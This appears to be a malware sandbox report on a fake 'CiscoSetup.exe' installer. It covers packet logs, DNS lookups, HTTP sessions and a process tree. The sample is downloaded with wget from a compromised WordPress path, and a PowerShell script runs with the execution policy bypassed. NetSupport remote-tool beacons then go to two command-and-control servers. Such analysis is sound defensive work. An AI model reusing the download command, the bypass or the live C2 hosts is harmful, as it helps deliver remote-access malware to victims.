                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890909910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890928030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.891015053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.892901897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.892950058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893142939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893193007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893217087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.893217087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895117044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895174026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895355940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895355940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895402908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895422935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.895508051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899384022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899429083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899609089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899658918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.899769068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.903778076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.903831005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904067993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904067993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.904119968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907277107 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907320976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907490015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907490015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907537937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.907560110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.930809021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.930862904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931030989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.931030989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162899017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166301966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166311026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166502953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166502953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166513920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166520119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166520119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166604042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.210009098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.212830067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.212842941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213028908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213028908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213052034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213062048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213129044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213275909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220150948 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220170021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220345974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220345974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220367908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220380068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220380068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220592976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221085072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221102953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221415043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221432924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221604109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225224018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225251913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225430012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225430012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225452900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225461960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225527048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225646973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230267048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230285883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230463982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230463982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230488062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230488062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230498075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230561972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230706930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236072063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236090899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236270905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236270905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236293077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236303091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236368895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236479044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236557961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237008095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237027884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237195015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237195015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237210989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237301111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237389088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.244988918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245007992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245173931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245173931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245203018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245213985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245273113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245384932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245965958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245984077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246175051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246175051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246196032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246207952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246207952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246459961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247214079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247234106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247430086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247430086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247450113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247462988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247462988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247765064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261574030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261631012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261889935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261910915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.262120962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275249958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275306940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275659084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275866032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278459072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278513908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278687000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278687000 CET49755443192.168.11.2054.37.62.77
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 18:05:20.343585968 CET | 49833 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2024 18:05:20.745665073 CET | 53 | 49833 | 1.1.1.1 | 192.168.11.20
Oct 31, 2024 18:05:57.231923103 CET | 52226 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2024 18:05:57.307862997 CET | 60743 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2024 18:05:57.406302929 CET | 53 | 60743 | 1.1.1.1 | 192.168.11.20
Oct 31, 2024 18:05:57.475791931 CET | 53 | 52226 | 1.1.1.1 | 192.168.11.20
Oct 31, 2024 18:05:57.539499998 CET | 59509 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2024 18:05:57.726360083 CET | 53 | 59509 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 18:05:20.343585968 CET | 192.168.11.20 | 1.1.1.1 | 0x56f9 | Standard query (0) | asknetsupertech.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.231923103 CET | 192.168.11.20 | 1.1.1.1 | 0xb5a7 | Standard query (0) | payiki.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.307862997 CET | 192.168.11.20 | 1.1.1.1 | 0x33ba | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.539499998 CET | 192.168.11.20 | 1.1.1.1 | 0xdc56 | Standard query (0) | anyhowdo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 18:05:20.745665073 CET | 1.1.1.1 | 192.168.11.20 | 0x56f9 | No error (0) | asknetsupertech.com |  | 54.37.62.77 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.406302929 CET | 1.1.1.1 | 192.168.11.20 | 0x33ba | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.406302929 CET | 1.1.1.1 | 192.168.11.20 | 0x33ba | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.406302929 CET | 1.1.1.1 | 192.168.11.20 | 0x33ba | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.475791931 CET | 1.1.1.1 | 192.168.11.20 | 0xb5a7 | No error (0) | payiki.com |  | 151.236.16.15 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 18:05:57.726360083 CET | 1.1.1.1 | 192.168.11.20 | 0xdc56 | No error (0) | anyhowdo.com |  | 199.188.200.195 | A (IP address) | IN (0x0001) | false
• asknetsupertech.com
• 151.236.16.15 connection: keep-alive cmd=poll info=1 ack=1
• geo.netsupportsoftware.com
• 199.188.200.195 connection: keep-alive cmd=poll info=1 ack=1
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49756 | 151.236.16.15 | 443 | 4288 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 18:05:57.538871050 CET | 218 | OUT | POST http://151.236.16.15/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 151.236.16.15
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49757 | 172.67.68.212 | 80 | 4288 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 18:05:57.611530066 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Oct 31, 2024 18:05:58.008657932 CET | 783 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 17:05:57 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8db53b9f6e5e4309-EWR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDCCBQAACB=FOGAGJHBOOILJHKIGGLPDOCO; path=/
cf-apo-via: origin,host
X-Frame-Options: SAMEORIGIN
X-Powered-By: ASP.NET
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNB%2FAExhSlq1S3EhxqVyZQLGNmIkGufrHWMc7vdkEz2HH7nAqmnXOKeO8SCnShUCFJCdz4y8I6sIBq4qj616J5i7R4tad4G%2FSv%2FuJfXUNyGkBLb9QMGL%2FsHqD11jFIV893HUy8B3HoLa73MK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a
Data Ascii: 1040.7357,-74.1724
Oct 31, 2024 18:05:58.008858919 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49758 | 199.188.200.195 | 443 | 4288 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 18:05:57.784583092 CET | 222 | OUT | POST http://199.188.200.195/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 199.188.200.195
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49755 | 54.37.62.77 | 443 | 4116 | C:\Windows\SysWOW64\wget.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 17:05:21 UTC | 262 | OUT | GET /wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Accept-Encoding: identity
Host: asknetsupertech.com
Connection: Keep-Alive
2024-10-31 17:05:21 UTC | 406 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Fri, 25 Oct 2024 09:25:22 GMT
accept-ranges: bytes
content-length: 16877888
date: Thu, 31 Oct 2024 17:05:21 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1
                                                                                                                                                                                                  Imagebase:0xd60000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff79c270000
                                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:13:05:19
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wget.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:3'895'184 bytes
                                                                                                                                                                                                  MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:13:05:28
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\download\CiscoSetup.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\download\CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0xa90000
                                                                                                                                                                                                  File size:16'877'888 bytes
                                                                                                                                                                                                  MD5 hash:91F7229586DF2C577A54AD0D1A5BDCB1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:13:05:29
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe"
                                                                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                                                                  File size:3'548'672 bytes
                                                                                                                                                                                                  MD5 hash:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:13:05:53
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
                                                                                                                                                                                                  Imagebase:0x7ff61bb30000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:13:05:53
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff79c270000
                                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:11
